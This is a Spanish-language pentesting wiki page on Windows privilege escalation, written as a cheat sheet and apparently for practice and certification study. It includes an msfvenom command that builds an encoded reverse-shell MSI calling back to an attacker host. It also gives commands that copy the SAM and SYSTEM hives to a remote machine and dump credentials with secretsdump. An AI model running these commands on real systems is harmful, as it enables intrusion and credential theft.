📚
Securiters Wiki
  • 👋Índice
  • 🐣Conceptos Básicos
  • 🔍OSINT
    • Empresas
    • Personas
    • SOCMINT
    • URLs / IPs
  • 🕸️Web
    • 1. Recolección de información
    • 2. Enumeración y descubrimiento
    • 3. Configuración del servidor
    • 4. Entrada de datos
    • 5. Fuerza bruta
    • 6. Autenticación y autorización
    • 7. LFI/RFI
    • 🧞‍♂️CMS
  • 🐢APIs
  • ☎️Móviles
    • 👾Android
    • Analisis Estatico Android
    • Analisis Dinamico Android
    • 📱iOS
    • Jailbreak
    • Analisis Estatico iOS
    • Analisis Dinamico iOS
  • 🎯Internas
    • 🐧Linux
    • 🏹AD
      • Enumeracion
      • Mimikatz & PassTheHash
      • Local Privilege Escalation
      • PE - AS-REPRoast
      • PE - DNSAdmin
      • PE - Kerberoast
      • PE - Trusts
      • PE - Delegations
      • Persistencia - ACLs
      • Persistencia - Kerberos & Tickets
  • 📶Wifi
    • WEP
    • WPS
    • Redes PSK
    • Redes MGT
    • Redes ocultas
  • ⚔️Pentesting / Red team
    • Windows
      • Enumeración
      • Elevación de Privilegios
    • Linux
      • Enumeración
      • Elevación de Privilegios
    • Shells
  • 🛡️Blue Team
  • 📡Puertos & Servicios
    • 21 - FTP
    • 22 - SSH
    • 23 - Telnet
    • 25 - SMTP
    • 53 - DNS
    • 79 - Finger
    • 80 - HTTP
    • 88 - Kerberos
    • 110 - POP3
    • 111 - RPC
    • 123 - NTP (UDP)
    • 135 - MSRPC
    • 139 - Netbios-ssn
    • 143 - IMAP
    • 161/162 - SNMP
    • 389 - LDAP
    • 443 - HTTPS
    • 445 - SMB
    • 464 - kpasswd5
    • 500 - IPSec/IKE VPN
    • 587 - SMPT STARTTLS
    • 623 - IPMI
    • 631 - CUPS
    • 636 - LDAP
    • 1433/1434 - MS SQL Server
    • 1521 - OracleDB
    • 1720 - VoIP - SIP
    • 1900 - UPnP
    • 2049 - NFS
    • 3306 - MySQL
    • 3389 - RDP
    • 4500 - IPSec (UDP)
    • 5357 - WSDAPI
    • 6379 - Redis
    • 6697 - IRC
    • 8009 - Apache Jserv
    • 8080 - HTTP Alt
    • 8500 - Adobe Coldfusion
    • 10000 - Webmin
    • 49981 - System Management Hub
    • 50000 - SAP
  • 🎣Phishing
  • 🐛Bug Bounty
  • ☁️Cloud
    • AWS
    • Azure
  • 🪲Malware
  • 👻Forense
  • 🛠️Tools & Scripts
    • BloodHound
    • Burp Suite
    • Enum4linux
    • Frida
    • Apps Móviles
      • ADB
      • Objection
    • Wireshark
    • Transferencia de ficheros
    • Libros de hacking
    • Addons
    • 🐧WSL
  • ⛳Practicar
  • 🧙‍♂️Certificaciones
    • Repaso CRTP
    • Repaso OSCP
      • 1. Enumeración
      • 2. Vector de entrada
      • 3. Obtención de credenciales
      • 4. Spraying
      • 5. Movimiento lateral
      • 6. Siguientes pasos
  • 📜Recursos en Telegram
  • 🔊Congresos de ciberseguridad
  • 🗣️Entrevistas realizadas
  • 🎤Charlas y Eventos
  • 👣WRITE-UPS
    • 📗Hack The Box
      • 🟢Return
      • 🟢Love
      • 🟢GoodGames
      • 🟢ToolBox
      • 🟢Traverxec
      • 🟢Granny
      • 🟢Jerry
      • 🟢Networked
      • 🟢Arctic
      • 🟢Mirai
      • 🟢Bashed
      • 🟢TwoMillion
      • 🟠Chaos
      • 🟢Validation
      • 🟢Antique
      • 🟢Busqueda
    • 📗Proving Grounds
      • 🟢MoneyBox
      • 🟢Gaara
      • 🟢InfoSec Prep
      • 🟢DC-1
      • 🟢SunsetNoontide
      • 🟢Shakabrah
      • 🟢Ha-Natraj
      • 🟢Monitoring
      • 🟢DriftingBlues6
      • 🟢PyExp
      • 🟢OnSystemShellDredd
      • 🟢Blogger
      • 🟢Dawn
      • 🟢DC-2
      • 🟢FunboxEasy
      • 🟢Sumo
      • 🟢Inclusiveness
      • 🟢FunboxEasyEnum
      • 🟢Potato
      • 🟢Solstice
      • 🟢SunsetDecoy
      • 🟢Lampiao
      • 🟢Vegeta1
      • 🟢Katana
      • 🟢BBSCute
      • 🟢Sar
      • 🟢EvilBox-One
      • 🟢Seppuku
      • 🟢Funbox Rookie
      • 🟢Photographer
      • 🟢CyberSploit1
      • 🟢Amaterasu
      • 🟠Pwned1
      • 🟠My-CMSMS
      • 🟠ICMP
      • 🟠DC-9
      • 🟠SunsetMidnight
      • 🟠Election1
      • 🟠DC-4
      • 🟠Stapler
      • 🟠BTRSys2.1
      • 🟠Assertion101
      • 🟠Loly
      • 🟠SoSimple
      • 🟠Tre
      • 🟠Funbox
      • 🟠NoName
      • 🔴GlasgowSmile
      • 🔴InsanityHosting
      • 🔴Djinn3
      • 🟠CTF SunsetMidnight
Powered by GitBook
On this page
  • Configuración de servicios
  • Configuración de ficheros
  • Configuración de registros
  • Gestión de contraseñas
  • Tareas programadas
  • Manipulación de privilegios
  • Herramientas
  • Recursos
  • Herramientas

Was this helpful?

  1. Pentesting / Red team
  2. Windows

Elevación de Privilegios

Configuración de servicios

Configuración de ficheros

Usamos el comando icalcs "C:\ruta\al\fichero\o\directorio" para conocer la configuración de un fichero, con 3 posibles modos:

  • (F) Full Control

  • (M) Modify

  • (W) Write

Configuración de registros

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Una vez nos aparece como resultado "0x1" (que el bit está a 1, es decir, habilitado) podemos generar un exploit a la máquina víctima:

msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST=X.X.X.X LPORT=1337 --encoder x64/xor --iterations 9 --format msi --out AlwaysInstallElevated.msi

Gestión de contraseñas

Para listar las credenciales almacenadas

cmdkey /list

Para enviar una copia de la SAM

copy C:\Windows\Repair\SAM \\IP.DE.TU.MAQUINA\
copy C:\Windows\Repair\SYSTEM \\IP.DE.TU.MAQUINA\
python3 secretsdump.py domain/user:password@IP.DE.MAQUINA.VICTIMA

Tareas programadas

schtasks /query /fo LIST /v #cmd
Get-ScheduledTask #PS

Manipulación de privilegios

Hay 3 posibles formas de evadirlos y aprovecharlos:

  1. Suplantación/Robo de Token - Un atacnte duplica un token existente usando DuplicateToken(Ex). El token puede entonces ser utilizado con ImpersonateLoggedOnUser para permitir que el hilo de llamada suplante el contexto de seguridad de un usuario conectado, o con SetThreatTokento asignar el token suplantado a un hilo. Esto es útil para cuando el usuario objetivo tiene una sesión de inicio de sesión no de red en el sistema.

  2. Crear Proceso con un Token - Un atacante crea un nuevo token de acceso con DuplicateToken(Ex) y lo usa con CreateProcessWithTokenW para crear un nuevo proceso que se ejecuta bajo el contexto de seguridad del usuario suplantado.

  3. Creación y suplantación de Token - Un atacante con credenciales pero sin haber iniciado sesión en el sistema puede crear una sesión utilizandoLogonUserfunction. La función devolverá una copia del token de acceso de la sesión y el atacante puede utilizarSetThreadtTokento asignar el token a un hilo.

Para saber la configuración que tiene una máquina:

whoami /priv

Una vez sabemos los privilegios habilitados, vamos a ver los más interesantes:

Nombre
Descripción

SeImpersonatePrivilege

Suplanta a un usuario tras haberse autenticado

SeBackupPrivilege

Da acceso a cualquier fichero sin tener en cuenta su ACL

SeCreateTokenPrivilege

Este token puede ser utilizado solamente si el usuario puede suplantar tokens (incluso sin SeImpersonatePrivilege)

SeLoadDriverPrivilege

Carga y descarga drivers

SeRestorePrivilege

Da permisos de escritura a cualquier fichero.

SeTakeOwnershipPrivilege

Toma el control de un objeto sin que se haya concedido acceso.

SeTcbPrivilege

A través de KERB_S4U_LOGON se puede obtener un token de suplantación a cualquier otro usuario sin conocer las credenciales, añadir un grupo arbitrario (admins) al token, establecer el nivel de integridad del token en "medium", y asignar este token al hilo actual (SetThreadToken).

Herramientas

  • winPEASany.exe

  • Seatbelt.exe

  • PowerUp.ps1

  • SharpUp.exe

Recursos

Herramientas

PreviousEnumeraciónNextLinux

Last updated 8 months ago

Was this helpful?

Teniendo credenciales de la máquina víctima podemos extraer las credenciales con de

⚔️
secretsdump
Impacket
https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/
https://tryhackme.com/room/windows10privesc
https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
https://github.com/bitsadmin/wesng
https://github.com/itm4n/PrivescCheck